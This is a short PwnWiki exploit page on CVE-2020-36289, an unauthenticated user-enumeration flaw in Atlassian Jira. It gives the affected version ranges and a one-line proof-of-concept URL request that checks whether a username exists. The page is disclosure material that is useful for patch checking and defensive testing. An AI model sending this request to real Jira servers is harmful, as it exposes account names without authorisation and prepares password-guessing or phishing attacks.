CVE-2020-36289 Atlassian Jira Unauth 用戶枚舉漏洞

From PwnWiki
Revision as of 20:18, 11 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎español • ‎עברית • ‎中文(中国大陆)‎

影響版本

Jira < 8.5.13
8.6.0 ≤ Jira < 8.13.5
8.14.0 ≤ Jira < 8.15.1

POC

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

截圖

Twitter E3k2 J4VIAAWR 6.jpg

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-36289_Atlassian_Jira_Unauth_用戶枚舉漏洞&oldid=4763"